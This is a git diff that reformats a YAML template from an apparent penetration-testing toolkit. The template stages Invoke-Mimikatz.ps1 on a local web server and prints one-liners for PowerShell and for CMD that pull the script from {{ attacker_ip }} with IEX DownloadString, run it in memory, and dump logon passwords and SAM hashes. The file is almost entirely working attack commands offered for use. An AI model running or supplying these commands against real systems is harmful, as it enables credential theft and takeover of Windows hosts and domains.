--- a/src/profi/templates/scripts/deliver-windows-Invoke-mimikatz.ps1.yaml
+++ b/src/profi/templates/scripts/deliver-windows-Invoke-mimikatz.ps1.yaml
@@ -1,30 +1,20 @@
+---
 metadata:
-  filename: deliver-windows-Invoke-mimikatz.ps1.yaml
-  tags:
-  - windows
-  - domain
-  - cracking
-  - privesc
-  created: '2025-03-29'
-  author: Unknown
-content: "mkdir -p packstation/outbound; cp -n {{ tools_dir }}/mimikatz/Invoke-Mimikatz.ps1\
-  \ packstation/outbound/; \\\necho '================================================================';\
-  \ \\\necho '                      -----PowerShell-----                      '; \\\
-  \necho 'Preparation: Open Powershell with administrative privileges'; \\\necho 'Deliver\
-  \ & Inject to memory: IEX (New-Object System.Net.Webclient).DownloadString(\\'http://{{\
-  \ attacker_ip }}:{{ delivery_outbound_port }}/Invoke-Mimikatz.ps1\\')'; \\\necho\
-  \ 'Usage: Invoke-Mimikatz -Command \\'\"privilege::debug\" \"token::elevate\" \"\
-  sekurlsa::logonpasswords\" \"lsadump::sam\" \"exit\"\\''; \\\necho '================================================================';\
-  \ \\\necho '                         -----CMD-----                          '; \\\
-  \necho 'Deliver & Inject to memory & Execute (PS 64-bit): %windir%\\Sysnative\\\
-  WindowsPowerShell\\v1.0\\powershell.exe -Command \"& {IEX (New-Object System.Net.Webclient).DownloadString(\\\
-  'http://{{ attacker_ip }}:{{ delivery_outbound_port }}/Invoke-Mimikatz.ps1\\');\
-  \ Invoke-Mimikatz -Command \\'\\\\\"privilege::debug\\\\\" \\\\\"token::elevate\\\
-  \\\" \\\\\"sekurlsa::logonpasswords\\\\\" \\\\\"exit\\\\\"\\'}\"'; \\\necho 'Deliver\
-  \ & Inject to memory & Execute (PS 32-bit): powershell -Command \"& {IEX (New-Object\
-  \ System.Net.Webclient).DownloadString(\\'http://{{ attacker_ip }}:{{ delivery_outbound_port\
-  \ }}/Invoke-Mimikatz.ps1\\'); Invoke-Mimikatz -Command \\'\\\\\"privilege::debug\\\
-  \\\" \\\\\"token::elevate\\\\\" \\\\\"sekurlsa::logonpasswords\\\\\" \\\\\"exit\\\
-  \\\"\\'}\"'; \\\necho '================================================================';\
-  \ \\\n python {{ templates_dir }}/helper_scripts/startEnhancedHttpServer.py -p {{\
-  \ delivery_outbound_port }} -d packstation/outbound\n"
+  filename: "deliver-windows-Invoke-mimikatz.ps1.yaml"
+  tags: ["windows", "domain", "cracking", "privesc"]
+  created: "2025-03-29"
+  author: "Unknown"
+
+content: |
+  mkdir -p packstation/outbound; cp -n {{ tools_dir }}/mimikatz/Invoke-Mimikatz.ps1 packstation/outbound/; \
+  echo '================================================================'; \
+  echo '                      -----PowerShell-----                      '; \
+  echo 'Preparation: Open Powershell with administrative privileges'; \
+  echo 'Deliver & Inject to memory: IEX (New-Object System.Net.Webclient).DownloadString(\'http://{{ attacker_ip }}:{{ delivery_outbound_port }}/Invoke-Mimikatz.ps1\')'; \
+  echo 'Usage: Invoke-Mimikatz -Command \'"privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::sam" "exit"\''; \
+  echo '================================================================'; \
+  echo '                         -----CMD-----                          '; \
+  echo 'Deliver & Inject to memory & Execute (PS 64-bit): %windir%\Sysnative\WindowsPowerShell\v1.0\powershell.exe -Command "& {IEX (New-Object System.Net.Webclient).DownloadString(\'http://{{ attacker_ip }}:{{ delivery_outbound_port }}/Invoke-Mimikatz.ps1\'); Invoke-Mimikatz -Command \'\\"privilege::debug\\" \\"token::elevate\\" \\"sekurlsa::logonpasswords\\" \\"exit\\"\'}"'; \
+  echo 'Deliver & Inject to memory & Execute (PS 32-bit): powershell -Command "& {IEX (New-Object System.Net.Webclient).DownloadString(\'http://{{ attacker_ip }}:{{ delivery_outbound_port }}/Invoke-Mimikatz.ps1\'); Invoke-Mimikatz -Command \'\\"privilege::debug\\" \\"token::elevate\\" \\"sekurlsa::logonpasswords\\" \\"exit\\"\'}"'; \
+  echo '================================================================'; \
+  python {{ templates_dir }}/helper_scripts/startEnhancedHttpServer.py -p {{ delivery_outbound_port }} -d packstation/outbound
